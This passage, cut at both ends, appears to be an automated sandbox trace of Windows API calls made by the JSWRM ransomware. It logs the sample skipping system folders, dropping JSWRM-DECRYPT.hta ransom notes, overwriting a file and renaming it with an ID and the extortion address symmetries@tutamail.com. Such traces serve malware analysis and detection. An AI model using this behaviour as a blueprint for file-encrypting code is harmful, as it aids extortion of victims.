hHeap=0x1e0000) returned 1 [0070.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0070.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.555] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa12313ee, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="images", cAlternateFileName="")) returned 1 [0070.555] lstrcmpiW (lpString1="images", lpString2=".") returned 1 [0070.555] lstrcmpiW (lpString1="images", lpString2="..") returned 1 [0070.555] lstrcmpiW (lpString1="images", lpString2="...") returned 1 [0070.555] lstrcmpiW (lpString1="images", lpString2="windows") returned -1 [0070.555] lstrcmpiW (lpString1="images", lpString2="recovery") returned -1 [0070.555] lstrcmpiW (lpString1="images", lpString2="perflogs") returned -1 [0070.556] lstrcmpiW (lpString1="images", lpString2="documents and settings") returned 1 [0070.556] lstrcmpiW (lpString1="images", lpString2="$RECYCLE.BIN") returned 1 [0070.556] lstrcmpiW (lpString1="images", lpString2="system volume information") returned -1 [0070.556] lstrcmpiW (lpString1="images", lpString2="msocache") returned -1 [0070.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0070.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0070.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0070.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0070.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2175c0 [0070.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0070.556] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\jswrm-decrypt.hta")) returned 0xffffffff [0070.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2175c0 | out: hHeap=0x1e0000) returned 1 [0070.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0070.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0070.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0070.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0070.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0070.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0070.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217b40 [0070.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0070.556] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0070.556] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.556] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0070.557] CloseHandle (hObject=0x454) returned 1 [0070.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217b40 | out: hHeap=0x1e0000) returned 1 [0070.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0070.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0070.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0070.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0070.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0070.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0070.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217300 [0070.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0070.558] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\jswrm-decrypt.hta")) returned 0x20 [0070.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217300 | out: hHeap=0x1e0000) returned 1 [0070.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0070.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0070.558] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa12313ee, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x20b71812, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232140 [0070.558] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.558] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa12313ee, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x20b71812, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0070.558] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.558] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.558] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa129361a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="cursors", cAlternateFileName="")) returned 1 [0070.558] lstrcmpiW (lpString1="cursors", lpString2=".") returned 1 [0070.558] lstrcmpiW (lpString1="cursors", lpString2="..") returned 1 [0070.558] lstrcmpiW (lpString1="cursors", lpString2="...") returned 1 [0070.558] lstrcmpiW (lpString1="cursors", lpString2="windows") returned -1 [0070.558] lstrcmpiW (lpString1="cursors", lpString2="recovery") returned -1 [0070.558] lstrcmpiW (lpString1="cursors", lpString2="perflogs") returned -1 [0070.558] lstrcmpiW (lpString1="cursors", lpString2="documents and settings") returned -1 [0070.558] lstrcmpiW (lpString1="cursors", lpString2="$RECYCLE.BIN") returned 1 [0070.558] lstrcmpiW (lpString1="cursors", lpString2="system volume information") returned -1 [0070.558] lstrcmpiW (lpString1="cursors", lpString2="msocache") returned -1 [0070.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0070.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0070.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0070.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0070.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0070.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0070.559] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\jswrm-decrypt.hta")) returned 0xffffffff [0070.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0070.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1e0 [0070.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0070.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffb0 [0070.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0070.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0070.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0070.562] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.563] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.564] WriteFile (in: hFile=0x458, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0070.564] CloseHandle (hObject=0x458) returned 1 [0070.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffb0 | out: hHeap=0x1e0000) returned 1 [0070.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0070.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0070.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0070.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0070.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0070.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0070.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0070.565] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\jswrm-decrypt.hta")) returned 0x20 [0070.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0070.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0070.565] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa129361a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x20b97cc8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20933c, cFileName=".", cAlternateFileName="")) returned 0x231c40 [0070.565] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.565] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa129361a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x20b97cc8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20933c, cFileName="..", cAlternateFileName="")) returned 1 [0070.565] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.565] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.565] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x500, dwReserved0=0x60002, dwReserved1=0x20933c, cFileName="cursors.properties", cAlternateFileName="CURSOR~1.PRO")) returned 1 [0070.565] lstrcmpiW (lpString1="cursors.properties", lpString2=".") returned 1 [0070.565] lstrcmpiW (lpString1="cursors.properties", lpString2="..") returned 1 [0070.565] lstrcmpiW (lpString1="cursors.properties", lpString2="...") returned 1 [0070.565] lstrcmpiW (lpString1="cursors.properties", lpString2="windows") returned -1 [0070.565] lstrcmpiW (lpString1="cursors.properties", lpString2="recovery") returned -1 [0070.565] lstrcmpiW (lpString1="cursors.properties", lpString2="perflogs") returned -1 [0070.565] lstrcmpiW (lpString1="cursors.properties", lpString2="documents and settings") returned -1 [0070.565] lstrcmpiW (lpString1="cursors.properties", lpString2="$RECYCLE.BIN") returned 1 [0070.565] lstrcmpiW (lpString1="cursors.properties", lpString2="system volume information") returned -1 [0070.565] lstrcmpiW (lpString1="cursors.properties", lpString2="msocache") returned -1 [0070.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cursors.properties", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0070.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0070.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cursors.properties", cchWideChar=18, lpMultiByteStr=0x241060, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cursors.properties", lpUsedDefaultChar=0x0) returned 18 [0070.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cursors.properties", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0070.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0070.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cursors.properties", cchWideChar=18, lpMultiByteStr=0x241010, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cursors.properties", lpUsedDefaultChar=0x0) returned 18 [0070.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0070.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0070.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0070.566] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0070.566] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1280) returned 1 [0070.566] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x500) returned 0x203550 [0070.566] ReadFile (in: hFile=0x45c, lpBuffer=0x203550, nNumberOfBytesToRead=0x500, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345e534*=0x500, lpOverlapped=0x0) returned 1 [0070.568] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.568] WriteFile (in: hFile=0x45c, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345e530*=0x500, lpOverlapped=0x0) returned 1 [0070.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0070.568] CloseHandle (hObject=0x45c) returned 1 [0070.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0070.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0070.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0070.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0070.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0070.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0070.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.568] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0070.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0070.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0070.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0070.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0070.569] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x99, dwReserved0=0x60002, dwReserved1=0x20933c, cFileName="invalid32x32.gif", cAlternateFileName="INVALI~1.GIF")) returned 1 [0070.569] lstrcmpiW (lpString1="invalid32x32.gif", lpString2=".") returned 1 [0070.569] lstrcmpiW (lpString1="invalid32x32.gif", lpString2="..") returned 1 [0070.569] lstrcmpiW (lpString1="invalid32x32.gif", lpString2="...") returned 1 [0070.569] lstrcmpiW (lpString1="invalid32x32.gif", lpString2="windows") returned -1 [0070.569] lstrcmpiW (lpString1="invalid32x32.gif", lpString2="recovery") returned -1 [0070.569] lstrcmpiW (lpString1="invalid32x32.gif", lpString2="perflogs") returned -1 [0070.569] lstrcmpiW (lpString1="invalid32x32.gif", lpString2="documents and settings") returned 1 [0070.569] lstrcmpiW (lpString1="invalid32x32.gif", lpString2="$RECYCLE.BIN") returned 1 [0070.569] lstrcmpiW (lpString1="invalid32x32.gif", lpString2="system volume information") returned -1 [0070.569] lstrcmpiW (lpString1="invalid32x32.gif", lpString2="msocache") returned -1 [0070.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="invalid32x32.gif", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0070.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0070.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="invalid32x32.gif", cchWideChar=16, lpMultiByteStr=0x241038, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invalid32x32.gif", lpUsedDefaultChar=0x0) returned 16 [0070.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="invalid32x32.gif", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0070.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0070.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="invalid32x32.gif", cchWideChar=16, lpMultiByteStr=0x241358, cbMultiByte=16, lpDefaultChar=0x0, 